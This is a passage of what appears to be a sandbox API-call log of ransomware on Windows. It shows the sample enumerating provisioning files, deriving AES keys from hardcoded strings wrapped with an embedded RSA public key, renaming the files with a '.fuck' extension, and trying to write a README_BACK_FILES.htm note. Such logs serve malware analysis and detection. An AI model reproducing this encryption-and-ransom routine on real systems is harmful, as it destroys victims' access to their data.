(normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime.xml.fuck")) returned 0 [0237.698] CryptDestroyHash (hHash=0x28463e0) returned 1 [0237.698] CryptDestroyKey (hKey=0x2846660) returned 1 [0237.698] CryptReleaseContext (hProv=0x2857e30, dwFlags=0x0) returned 1 [0237.698] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0237.698] FindClose (in: hFindFile=0x2845ea0 | out: hFindFile=0x2845ea0) returned 1 [0237.698] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\readme_back_files.htm")) returned 0xffffffff [0237.699] AreFileApisANSI () returned 1 [0237.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0237.699] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.699] GetLastError () returned 0x5 [0237.699] GetLastError () returned 0x5 [0237.699] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0237.699] FindClose (in: hFindFile=0x2845de0 | out: hFindFile=0x2845de0) returned 1 [0237.700] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\readme_back_files.htm")) returned 0xffffffff [0237.700] AreFileApisANSI () returned 1 [0237.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2f58, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0237.700] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.700] GetLastError () returned 0x5 [0237.700] GetLastError () returned 0x5 [0237.700] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.700] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28463e0 [0237.701] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.701] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.701] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0237.701] GetLastError () returned 0x5 [0237.701] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml")) returned 0x20 [0237.702] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml", dwFileAttributes=0x80) returned 0 [0237.702] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.703] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.703] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.703] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2858490) returned 1 [0237.705] CryptCreateHash (in: hProv=0x2858490, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0237.705] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.705] CryptHashData (hHash=0x2846460, pbData=0x2ecb20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.706] CryptDeriveKey (in: hProv=0x2858490, Algid=0x6610, hBaseData=0x2846460, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x2845ea0) returned 1 [0237.706] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.706] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0237.706] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2858c88) returned 1 [0237.706] CryptImportPublicKeyInfo (in: hCryptProv=0x2858c88, dwCertEncodingType=0x1, pInfo=0x284f668*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x284f698*, PublicKey.cbData=0x8c, PublicKey.pbData=0x284f6a0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x2846ce0) returned 1 [0237.706] CryptEncrypt (in: hKey=0x2846ce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0237.706] CryptEncrypt (in: hKey=0x2846ce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2858518*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2858518*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0237.707] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2858518, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.707] ReadFile (in: hFile=0xffffffff, lpBuffer=0x285c980, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x285c980, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0237.707] CryptEncrypt (in: hKey=0x2845ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285c980*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x285c980*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0237.707] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285c980, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.707] CloseHandle (hObject=0xffffffff) returned 1 [0237.707] CloseHandle (hObject=0xffffffff) returned 1 [0237.707] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml"), bFailIfExists=0) returned 0 [0237.707] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml", dwFileAttributes=0x0) returned 0 [0237.708] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml.gsg")) returned 0 [0237.708] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml.fuck")) returned 0 [0237.708] CryptDestroyHash (hHash=0x2846460) returned 1 [0237.708] CryptDestroyKey (hKey=0x2845ea0) returned 1 [0237.708] CryptReleaseContext (hProv=0x2858490, dwFlags=0x0) returned 1 [0237.708] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.708] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0237.708] GetLastError () returned 0x5 [0237.709] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\masterdatastore.xml")) returned 0x20 [0237.709] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\MasterDatastore.xml", dwFileAttributes=0x80) returned 0 [0237.709] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.709] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\masterdatastore.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.709] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\MasterDatastore.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.710] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2857da8) returned 1 [0237.712] CryptCreateHash (in: hProv=0x2857da8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0237.712] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.712] CryptHashData (hHash=0x2845de0, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.712] CryptDeriveKey (in: hProv=0x2857da8, Algid=0x6610, hBaseData=0x2845de0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x2845ea0) returned 1 [0237.712] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.712] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0237.712] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28585a0) returned 1 [0237.713] CryptImportPublicKeyInfo (in: hCryptProv=0x28585a0, dwCertEncodingType=0x1, pInfo=0x2850368*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2850398*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28503a0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x2846560) returned 1 [0237.713] CryptEncrypt (in: hKey=0x2846560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0237.713] CryptEncrypt (in: hKey=0x2846560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2858380*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2858380*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0237.713] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2858380, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.713] ReadFile (in: hFile=0xffffffff, lpBuffer=0x285c980, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x285c980, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0237.713] CryptEncrypt (in: hKey=0x2845ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285c980*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x285c980*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0237.714] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285c980, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.714] CloseHandle (hObject=0xffffffff) returned 1 [0237.714] CloseHandle (hObject=0xffffffff) returned 1 [0237.714] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\masterdatastore.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\masterdatastore.xml"), bFailIfExists=0) returned 0 [0237.714] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\MasterDatastore.xml", dwFileAttributes=0x0) returned 0 [0237.715] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\masterdatastore.xml.gsg")) returned 0 [0237.715] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\masterdatastore.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\MasterDatastore.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\masterdatastore.xml.fuck")) returned 0 [0237.715] CryptDestroyHash (hHash=0x2845de0) returned 1 [0237.715] CryptDestroyKey (hKey=0x2845ea0) returned 1 [0237.715] CryptReleaseContext (hProv=0x2857da8, dwFlags=0x0) returned 1 [0237.715] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.716] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x2846460 [0237.716] FindNextFileA (in: hFindFile=0x2846460, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.716] FindNextFileA (in: hFindFile=0x2846460, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.716] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x2845de0 [0237.717] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.717] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.718] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0237.718] GetLastError () returned 0x5 [0237.718] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_0.provxml")) returned 0x20 [0237.718] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x80) returned 0 [0237.718] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_0.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.718] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_0.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.719] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_0.provxml.gsg", dwFileAttributes=0x2) returned 0 [0237.719] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28581e8) returned 1 [0237.721] CryptCreateHash (in: hProv=0x28581e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0237.721] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0237.721] CryptHashData (hHash=0x2845ea0, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.721] CryptDeriveKey (in: hProv=0x28581e8, Algid=0x6610, hBaseData=0x2845ea0, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2846620) returned 1 [0237.721] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.721] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0237.722] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2858490) returned 1 [0237.722] CryptImportPublicKeyInfo (in: hCryptProv=0x2858490, dwCertEncodingType=0x1, pInfo=0x284fdb8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x284fde8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x284fdf0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28467a0) returned 1 [0237.722] CryptEncrypt (in: hKey=0x28467a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0237.722] CryptEncrypt (in: hKey=0x28467a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2857da8*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2857da8*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0237.722] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2857da8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.722] ReadFile (in: hFile=0xffffffff, lpBuffer=0x285bd78, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x285bd78, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0237.722] CryptEncrypt (in: hKey=0x2846620, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285bd78*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x285bd78*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0237.722] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285bd78, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.723] CloseHandle (hObject=0xffffffff) returned 1 [0237.723] CloseHandle (hObject=0xffffffff) returned 1 [0237.723] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_0.provxml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_0.provxml"), bFailIfExists=0) returned 0 [0237.723] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_0.provxml", 